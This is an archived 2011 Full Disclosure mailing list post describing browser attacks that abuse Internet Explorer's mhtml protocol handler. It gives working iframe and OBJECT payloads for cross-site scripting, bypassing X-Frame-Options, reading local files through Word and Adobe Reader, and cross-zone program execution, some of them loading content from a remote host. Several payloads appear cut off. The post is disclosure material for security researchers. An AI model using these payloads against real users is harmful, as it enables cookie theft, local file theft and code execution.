Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Hacking with mhtml protocol handler
From: IEhrepus <5up3rh3i () gmail com>
Date: Sat, 15 Jan 2011 01:12:15 -0800

Hacking with mhtml protocol handler

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15

Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) Was finally
released yesterday, There are two articles about the browser security[0x05
and 0x06].If the combination of both, we can complete a lot of interesting

1.Cross Site Scripting by upload mhtml file

Using the mhtml protocol handler,The file extension is ignored.so the
attacker use renname the  mhtml file to a *.jpg file,etc. then upload it to
the target site...

ofcouser ,we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload
file format security restrictions

then use iframe tag src to it:

<iframe src="MHTML:http://target-site.com/upfile/demo.html!cookie";></iframe>

2.Cross Site Scripting mhtml-file string injection

the mhtml-file format is only base on CRLF,so if we can injection CRLF, the
site may be attacked.


test it on win7 system pls.

<iframe src="mhtml:

if win-xp or win2k3 system,pls do it by the second urlencode.

mhtml-file string injection in JOSN file, some sites restrict the JOSN
file's Content-Type to defense xss. maybe we can use mhtml-file string
injection to pass it :)

3.bypass X-Frame-Options

X-Frame-Options did not protect the mhtml protocol handler.

the demo:

<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie";></iframe>
<iframe src="http://www.80vul.com/mhtml/zz.php";></iframe>

4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul

Billy (BK) Rios introduced a very interesting approach to Steal local files
on the RuxCon/Baythreat(https://xs-sniper.com/blog/2010/12/17/will-it-blend/)
,it used  "Script src to local files in the LocalLow directory" by file://
+java apple +Adobe Reader+Adobe flash to complete it. but if used
mhtml+file://uncpath, so easy to do it.


test it on win2k3+ie8+Adobe Reader 9


5.mhtml+file://uncpath+word == local xss vul


download it, and save it on c:\word.doc and open it. u can get the alert
c:\boot.ini 's content.

this is base on "Microsoft word javascript execution"(

to make the proof of concept follow the following steps:

1-Make a html file and paste xss code
2-Open the html file with the word and save as c:\word.xml
3-Open the word.xml with the notepad,and inject the mhtml code in <w:t>aaaaa
4-Rename c:\word.xml to c:\word.doc
5-Open c:\word.doc file

xss code
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=http://www.80vul.com/hackgame/word.htm></OBJECT>

mhtml code
Content-Type: multipart/related; boundary="_boundary_by_mere":




if u use this vul to attack someone,u need to known the word file path where
save the download file. and lots of guns used on the desktop :)

"Microsoft word javascript execution" is only work on office 2k3 and 2k7, In
other versions u can make the link, and src to

6. Coss Zone Scripting

First we would like to mention a very old vulnerability:

<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-111111111111

This vulnerability (by firebug9[
allows you to execute any program on "My Computer" zone,Been tested and
found to this vul work on ie6/ie7/ie8+win2k/winxp/win2k3

Then repeat "5.mhtml+file://uncpath+word == local xss vul" steps and change:

xss code
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=mhtml:file://c:/word.doc!cookie></OBJECT>

mhtml code
Content-Type: multipart/related; boundary="_boundary_by_mere":




thx d4rkwind(http://hi.baidu.com/d4rkwind/) for his excellent paper.

About Ph4nt0m Webzine

Ph4nt0m Webzine is a free network Security Magazine,We accept articles in
English and Chinese, you are welcome contributions .
mailto:root_at_ph4nt0m.org pls.thank you!

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]